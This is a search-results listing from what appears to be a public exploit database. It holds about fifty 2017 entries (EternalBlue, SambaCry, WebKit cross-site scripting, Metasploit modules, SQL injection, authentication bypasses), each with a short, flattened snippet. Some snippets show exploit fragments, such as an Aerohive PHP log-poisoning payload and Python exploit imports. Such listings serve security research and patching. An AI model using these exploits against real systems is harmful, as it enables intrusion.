47885 matches found
WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation
pageCacheState != Document::InPageCache ... mframe.document-prepareForDestruction; removeFocusedNodeOfSubtreemframe.document; ... mframe.setDocumentnullptr; domWindow; Click anywhere. function createURLdata, type = 'text/html' return URL.createObjectURLnew Blobdata, type: type; window.onclick = =...
WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting
Sources: https://bugs.chromium.org/p/project-zero/issues/detail?id=1146 https://bugs.chromium.org/p/chromium/issues/detail?id=519558 VULNERABILITY DETAILS From /WebKit/Source/core/dom/ContainerNode.cpp: ---------------- void ContainerNode::parserInsertBeforePassRefPtrWillBeRawPtr newChild, Node&...
WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting
let xml = let p = document.querySelector'p'; let link = p.appendChilddocument.createElement'link'; link.rel = 'stylesheet'; link.href = 'data:,aaaaazxczxczzxzcz'; let btn = document.body.appendChilddocument.createElement'button'; btn.id = 'btn'; btn.onfocus = = btn.onfocus = null; window.d =...
Sandboxie 5.18 - Local Denial of Service
author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: Sandboxie version 5.18 local Dos Exploit Date: 2017.05.25 Exploit Author: Greg Priest Version: Sandboxie version 5.18 ... Released on 13 April 2017 Tested on: Windows7 x64 HUN/ENG Professiona...
Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting
url; ... if !allowedToLoadFrameURLurl return; ... bool beforeLoadAllowedLoad = guardedDispatchBeforeLoadEventurl; ... bool success = beforeLoadAllowedLoad && hasValidClassId; if success success = requestObjecturl, serviceType, paramNames, paramValues; ... bool...
NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
''' Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion Date: 2017-05-21 Exploit Author: f3ci Vendor Homepage: http://www.netgain-systems.com Software Link: http://www.netgain-systems.com/free-edition-download/ Version: = v7.2.647 build 941 Tested on: Windows...
Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow
author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.SEH Date: 2017.05.24 Exploit Author: Greg Priest Version: Dup Scout Enterprise v9.7.18 Tested on: Windows7 x64 HUN/ENG...
Samba 3.5.0 - Remote Code Execution
!/usr/bin/env python Title : ETERNALRED Date: 05/24/2017 Exploit Author: steelo Vendor Homepage: https://www.samba.org Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 CVE-2017-7494 import argparse import os.path import sys import tempfile import time from smb.SMBConnection import SMBConnection from smb import...
Apple macOS/iOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1140 netagentctlsetopt is the setsockopt handler for netagent control sockets. Options of type NETAGENTOPTIONTYPEREGISTER are handled by netagenthandleregistersetopt. Here's the code: static errnot...
Apple macOS/iOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1123 unpexternalize is responsible for externalizing the file descriptors carried within a unix domain socket message. That means allocating new fd table entries in the receiver and recreating a file which looks to userspac...
Apple macOS/iOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1175 CAMediaTimingFunctionBuiltin is a class in QuartzCore. Its initWithCoder: method reads an Int "index" then passes that to builtinfunction mov ebx, edi -- controlled unsigned int mov r14d, ebx lea r15, ZL9functions0 ; functions...
Apple macOS/iOS - NSUnarchiver Heap Corruption Due to Lack of Bounds Checking in [NSBuiltinCharacterSet initWithCoder:]
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1170 Via NSUnarchiver we can read NSBuiltinCharacterSet with a controlled serialized state. It reads a controlled int using decodeValueOfObjCType:"i" then either passes it to CFCharacterSetGetPredefined or uses it directly to...
Apple macOS/iOS - Memory Corruption Due to Bad Bounds Checking in NSCharacterSet Coding for NSKeyedUnarchiver
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1168 The dump today has this list of iOS stuff: https://wikileaks.org/ciav7p1/cms/page13205587.html Reading through this sounded interesting: """ Buffer Overflow caused by deserialization parsing error in Foundation library Sending...
Apple macOS/iOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1172 Using lldb inside a simple helloworld app for iOS we can see that there are over 600 classes which we could get deserialized for persistance for example. The TextInput framework which is loaded has a class TIKeyboardLayout. Th...
VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VX Search Enterprise GET Buffer Overflow', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability in the web interfac...
Apple macOS - Lack of Bounds Checking in HIServices Custom CFObject Serialization Local Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1219 HIServices.framework is used by a handful of daemons and implements its own CFObject serialization mechanism. The entrypoint to the deserialization code is AXUnserializeCFType; it reads a type field and uses that to index an...
Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution
!/usr/bin/python3 TARGET: AeroHive AP340 HiveOS $cmd"; die; ?" URL of the login page where we will inject our PHP command exec code so it poisons the log file posturl= "/login.php5?version=6.1r2" postfields = "loginauth" : "1", "miniHiveUI" : "1", "userName" : payloadinject, "password" : "1234"...
Apple macOS - '32-bit syscall exit' Kernel Register Leak
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1149 The XNU kernel, when compiled for a x86-64 CPU, can run 32-bit x86 binaries in compatibility mode. 32-bit binaries use partly separate syscall entry and exit paths. To return to userspace, unixsyscall in...
Apple macOS - 'stackshot' Raw Frame Pointers
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1164 This is an issue that allows unentitled root to read kernel frame pointers, which might be useful in combination with a kernel memory corruption bug. By design, the syscall stacksnapshotwithconfig permits unentitled root to du...
Linux Kernel 4.11 - eBPF Verifier Log Leaks Lower Half of map Pointer
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1251 When the eBPF verifier kernel/bpf/verifier.c runs in verbose mode, it dumps all processed instructions to a user-accessible buffer in human-readable form using printbpfinsn. For instructions with class BPFLD and mode BPFIMM,...
VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142 This vulnerability permits an unprivileged user on a Linux machine on which VMWare Workstation is installed to gain root privileges. The issue is that, for VMs with audio, the privileged VM host process loads libasound, whic...
PlaySMS 1.4 - 'import.php' Remote Code Execution
Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php Date: 21-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website: http://touhidshaikh.com/ Category: webapps ...
Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt + ISR: ApparitionSec Vendor: ================ www.mantisbt.org Product: ========= Mantis Bug Tracker 1.3.10 / v2.3.0 MantisBT...
Secure Auditor 3.0 - Directory Traversal
Credits: John Page aka HYP3RLINX + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt + ISR: ApparitionSec Vendor: ==================== www.secure-bytes.com Product: ===================== Secure Auditor - v3.0 Secure...
KMCIS CaseAware - Cross-Site Scripting
Exploit Title: CaseAware Cross Site Scripting Vulnerability Date: 20th May 2017 Exploit Author: justpentest Vendor Homepage: https://caseaware.com/ Version: All the versions Contact: [email protected] CVE : 2017-5631 Source:...
Belden Garrettcom 6K/10K Switches - Authentication Bypass / Memory Corruption
Introduction ------------ Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT Magnum series network switches. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that...
Joomla! 3.7.0 - 'com_fields' SQL Injection
Exploit Title: Joomla 3.7.0 - Sql Injection Date: 05-19-2017 Exploit Author: Mateus Lino Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html Vendor Homepage: https://www.joomla.org/ Version: = 3.7.0 Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux...
Oracle PeopleSoft - Server-Side Request Forgery
Application: Oracle PeopleSoft Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55; PeopleSoft HCM 9.2 Vendor URL: http://oracle.com Bugs: SSRF Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory: 18.04.2017 Reference: Oracle CPU April 2017 Author: Roman Shalymov...
Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)
Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow PoC Date: 5-19-17 Exploit Author: Chance Johnson [email protected] Vendor Homepage: http://www.surething.com/ Software Link: http://www.surething.com/disclabeler Version: 6.2.138.0 Tested on: Windows 7 x64 / Windows 10 Usage: Ope...
D-Link DIR-600M Wireless N 150 - Authentication Bypass
Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass Date: 19-05-2017 Software Link: http://www.dlink.co.in/products/?pid=DIR-600M Exploit Author: Touhid M.Shaikh Vendor : www.dlink.com Contact : http://twitter.com/touhidshaikh22 Version: Hardware version: C1 Firmware version: 3.04...
PlaySMS 1.4 - Remote Code Execution
Exploit Title: PlaySMS 1.4 Remote Code Execution to Poisoning admin log Date: 19-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website: http://touhidshaikh.com/ Category: webapps 1. Description Remote...
Tecnovision DLX Spot - SSH Backdoor Access
Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password. Google Dork: "DlxSpot - Player4" Date: 2017-05-14 Discoverer: Simon Brannstrom Authors Website: https://unknownpwn.github.io/ Vendor Homepage: http://www.tecnovision.com/ Software Link: n/a Version: All known versions...
Tecnovision DLX Spot - Authentication Bypass
Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL Injection Google Dork: "DlxSpot - Player4" Date: 2017-05-14 Discoverer: Simon Brannstrom Authors Website: https://unknownpwn.github.io/ Vendor Homepage: http://www.tecnovision.com/ Software Link: n/a Version: 1.5.10 Tested on:...
Tecnovision DLX Spot - Arbitrary File Upload
Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload to RCE Google Dork: "DlxSpot - Player4" Date: 2017-05-14 Discoverer: Simon Brannstrom Authors Website: https://unknownpwn.github.io/ Vendor Homepage: http://www.tecnovision.com/ Software Link: n/a Version: 1.5.10 Tested on:...
ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass
Title: ManageEngine ServiceDesk Plus Application Compromise Date: 19 May 2017 Researcher: Steven Lackey ByteM3 Product: ServiceDesk Plus http://www.manageengine.com/ Affected Version: 9.0 Other versions could also be affected Fixed Version: Service Pack 9241 – Build 9.2 Vulnerability Impact: High...
SAP Business One for Android 1.2.3 - XML External Entity Injection
Exploit Title: Blind XXE (XML External Entity) in SAP Date of Disclosure: 17/05/2017 Author: Ravindra Singh Rathore Vendor Homepage: https://www.sap.com/products/business-one.html Product - SAP Business One Android Application Version - 1.2.3 Security Note: 2378065 CVE - CVE-2016-6256 CVSS - 6.5 XXE...
KDE 4/5 - 'KAuth' Local Privilege Escalation
// cc -Wall smb0k.c -pedantic -std=c11 // // smb4k PoC, also demonstrating broader scope of a generic kde // authentication bypass vulnerability // // C 2017 Sebastian Krahmer // define POSIXCSOURCE 200112L include include include include include include include include include void dieconst char...
Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity
!/usr/bin/python3 Oracle PeopleSoft SYSTEM RCE https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce cf 2017-05-17 import requests import urllib.parse import re import string import random import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning...
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
!/usr/bin/python from impacket import smb from struct import pack import sys import socket ''' EternalBlue exploit for Windows 7/2008 by sleepya The exploit might FAIL and CRASH a target system depended on what is overwritten EDB Note: Shellcode - x64...
INFOR EAM 11.0 Build 201410 - 'filtervalue' SQL Injection
SQL injection in INFOR EAM V11.0 Build 201410 search fields web/base/.. via filtervalue parameter ------------------- Assigned CVE: CVE-2017-7952 Reproduction steps: ------------------- 1. Log in with your EAM account 2. Go to any page with a search or filter field in it for example...
INFOR EAM 11.0 Build 201410 - Persistent Cross-Site Scripting via Comment Fields
Stored XSS in INFOR EAM V11.0 Build 201410 via comment fields ------------------- Assigned CVE: CVE-2017-7953 Reproduction steps: ------------------- 1. Log in with your EAM account 2. Go to the jobs page 3. Click on a record and open its page 4. Go to "Comments" tab 5. Click the add new comment...
Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service
function done var x = ''; for i=0; i'; var uri = 'data:image/svg+xml,' + x; var i = new Image; i.src = uri; !-- Visiting https://bugzilla.mozilla.org/attachment.cgi?id=8817075 may likely crash your browser tab. Debug Information: ============== ff4.1108: Stack overflow - code c00000fd first chanc...
Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Dup Scout Enterprise GET Buffer Overflow', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability ...
Apple iOS < 10.3.2 - Notifications API Denial of Service
Exploit Title: Apple iOS 10.3.2 - Notifications API Denial of Service Date: 05-15-2017 Exploit Author: Sem Voigtländer @OxFEEDFACE, Vincent Desmurs @vincedes3 and Joseph Shenton Vendor Homepage: https://apple.com Software Link: https://support.apple.com/en-us/HT207798 Version: iOS 10.3.2 Tested o...
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress PHPMailer Host Header Command Injection', 'Description' = %q This module exploits a command injection vulnerability in WordPress version...
Adobe Flash - Margin Handling Heap Corruption
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1174 The attached fuzzed swf causes a crash due to heap corruption when processing the margins of a rich text field. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42018.zip...
Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112 Windows: Running Object Table Register ROTFLAGSALLOWANYCLIENT EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7 Class: Elevation of Privilege Summary: By setting an appropriate AppID it’s possible for a...
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
!/usr/bin/python from impacket import smb, ntlm from struct import pack import sys import socket ''' EternalBlue exploit for Windows 8 and 2012 by sleepya The exploit might FAIL and CRASH a target system depended on what is overwritten The exploit support only x64 target EDB Note: Shellcode - x64...
Serviio Media Server - checkStreamUrl Command Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule /Restlet-Framework/ include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initializeinfo = superupdateinfoinfo, 'Name' =...
BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "BuilderEngine Arbitrary File Upload Vulnerability and execution", 'Description' = %q This module exploits a vulnerability found in BuilderEngine...